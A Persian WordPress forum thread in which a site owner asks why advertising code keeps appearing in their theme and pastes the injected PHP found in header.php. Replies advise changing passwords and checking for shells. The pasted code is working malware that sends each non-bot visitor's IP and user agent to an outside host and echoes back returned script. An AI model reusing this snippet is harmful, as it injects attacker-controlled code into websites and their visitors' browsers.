chemist

اضافه شدن کد تبلیغاتی به سورس قالب

11 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

با سلام و عرض خسته نباشید؛

برای بار دوم هست که در سورس قالب سایت بنده کد تبلیغاتی قرار میگیرد، یکبار در فوتر که لینکهای مخفی تبلیغ یک سایت فروش وی*پ*ی*ن و ... بود که با آپدیت خود وردپرس حذف شدند، و بار دوم بالاترین قسمت سایت کمی پایینتر میومد! و یک مربع کوچک در فرمت فلش که به یک سایت خارجی لینک شده بود! که اون هم با اسکن توسط یک آنتی ویروس مخصوص وردپرس به عنوان یک فایل مخرب شناخته شده، در فایل header.php حذف شد و الان ظاهراً مشکل حل شده ...

لازم به ذکر هست مرتباً پلاگین ها و وردپرس بروزرسانی می شوند.

سوال بنده این هست که بهترین روش برای جلوگیری از آلوده شدن فایلهای وردپرس و پلاگین ها به چنین کدهایی چیست؟ و راه ورود چنین کدهایی چیست؟

ویرایش شده در توسط chemist
0

به اشتراک گذاری این پست


لینک به پست

یعنی سایتم هک شده!!! دسترسی هکر تا چه حد میتونه باشه؟ از هک شدن سایتم چطور میتونم مطمئن بشم؟ اولین و بهترین اقدام چی میتونه باشه؟

0

به اشتراک گذاری این پست


لینک به پست

نمونه تصویر و آدرس آنلاین رو بذارید لطفاً تا بررسی کنیم.

1

به اشتراک گذاری این پست


لینک به پست

ممنون از دوستان که لطف کردن و راهنمایی فرمودن: کد متخلف رو پیدا کردم! ولی اینکه دلیلش چی میتونه باشه رو نمیدونم؟؟؟؟؟؟


<?php
#b1c17b#
error_reporting(0); ini_set('display_errors',0); $wp_vxdk88 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vxdk88) && !preg_match ('/bot/i', $wp_vxdk88))){
$wp_vxdk0988="http://"."html"."-title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vxdk88);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vxdk0988);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_88vxdk = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_88vxdk,1,3) === 'scr' ){ echo $wp_88vxdk; }
#/b1c17b#
?>

با سپاس

0

به اشتراک گذاری این پست


لینک به پست

هاستی که استفاده میکنید چیه؟

چه نوع تبلیغاتی به نمایش در میاد؟

1

به اشتراک گذاری این پست


لینک به پست

میهن وب هاست، با حذف این کدها برطرف شدند ... فقط میخواستم بدونم دلیل وجود این کدها در فایل هدر سایت چیه؟؟؟ ... و چطور میشه از این اتفاق جلوگیری کرد؟

قسمت بالای سایت به اندازه نیم سانت میومد پایین! و یک مربع کوچولو در سمت راست گوشه راست سایت دیده میشد که با کلیک بر روی اون به یک سایت خارجی میرفت!!!

0

به اشتراک گذاری این پست


لینک به پست

امنیت میهن وب هاست چون اشتراکیه ضعیفه احتمال اینکه هک شده باشی هم هست. پیشنهاد میکنم امنیت سایت رو ببر بالا و تمام پسورد های هاست،وردپرس و ایمیل رو عوض کن.

3

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

برای تغییر پسوردها؛ پسورد اف تی پی، نام دیتا بیس، پسور یوزر دیتا بیس و پسورد ورود به سی پنل، و پسورد مدیریت وردپرس رو عوض می کنم.

فقط یک سوال برای اینکه برای سایت مشکلی پیش نیاد، با تغییر نام و یوزر و ... دیتابیس در فایل کانفیگ وردپرس دیگه مشکلی پیش نمیاد که؟ یعنی فقط تنها کاری که می کنم این هست که؛ پسوردها رو عوض می کنم و فایل کانفیگ وردپرس رو بروز می کنم و تمام، درسته؟

ویرایش شده در توسط chemist
0

به اشتراک گذاری این پست


لینک به پست

آموزش های موجود رو که دوستمون لینک دادن کامل بخونید.

بررسی بکنید فایل شل وجود نداشته باشه (توی تایپیک های فوق و تایپیک های مشابه به دفعات زیاد مطرح شده)

3

به اشتراک گذاری این پست


لینک به پست

البتّه خب باید اینم توجّه داشته باشیم دوستان که با قیمت هایی که میهن وب هاست ارائه میده اصلاً غیراشتراکی نمیشه هم هاست داد...

اکثر هاستینگ ها هاست اشتراکی میدن و البتّه خب برخی هاشون یه سری مسائل امنیّتی رو بیشتر رعایت میکنن.

من خودم از میهن وب هاست استفاده میکنم و از لحاظ امنیّتی تا به حال در مورد هاست برام مسئله ای پیش نیومده.

1

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط prooshe
      سلام خسته نباشید.
      من بدون فعالسازی ssl و نصب افزونه از قسمت تنظیمات وردپرسم آدرس سایتم را از http به https تغییر دادم الان دیگه نه سایتم بالا میاد نه دسترسی به مدیریتم دارم تا دوباره ویرایش کنم لطفا راهنمایی کنید؟
    • توسط samadionline
      سلام خدمت شما عزیزان
      چطوری میشه در وردپرس مثل جوملا برای کاربران گروه و سطوح دسترسی تعریف کرد؟
      و همچنین اینکه در جوملا در تنظیمات میشد صفحه آفلاین تعریف کرد و کاربران با لاگین کردن وارد صفحه اصلی سایت میشدند در وردپرس چطور میشه این کار رو انجام داد؟
      تشکر می کنم اگر کسی سر در میاره یه توضیح مختصر بده
    • توسط ashkan91
      با سلام و خسته نباشید
      دوستان کسی میدونه چطور میشه فیلد ایمیل رو از تو فرم تسویه حساب ووکامرس غیرضروری کرد؟ (بدون استفاده از افزونه) یکی از دوستان این لینک رو فرستادن اما نمیدونم کدام تکه کد از این صفحه را میبایست درون کدهای سایت قرار بدم که مشکل حل بشه؟
      https://docs.woocommerce.com/document/tutorial-customising-checkout-fields-using-actions-and-filters/#example-make-phone-number-not-required
    • توسط aiinaz
      سلام دوستان 
       برای فونت من از @font face استفاده کردم تا فونتی که لازم دارم اعمال بشه اما نمی دونم چرا هر دفعه که صفحه رفرش میشه برای چند ثانیه فونت تغییر میکنه؟!!!! از نظر ادرس دهی هم درست انجام دادم و بعضی از فونت ها کلا اعمال نمیشه با اینکه روی سیستمم دارم؟!!!
    • توسط seosec
      سلام دوستان وقت بخیر ما یک سایت داریم قبلا توسط یک نفر طراحی شده و دگ پشتیبانی نمیشه.میخاییم خودمان پشتیبانی را انجام بدیم قصد داریم افزونه ووکامرس از ساست ژاکت بخریم فقط نمیدوینم با قالب ما سازگار هست یا نه؟اسم قالب سایت هم نمیدونیم!! سایت ما در زمینه اموزش امنیت اطلاعات میباشد!کسی میتونه راهنمایی کنه؟؟ ادرس سایت seosec.ir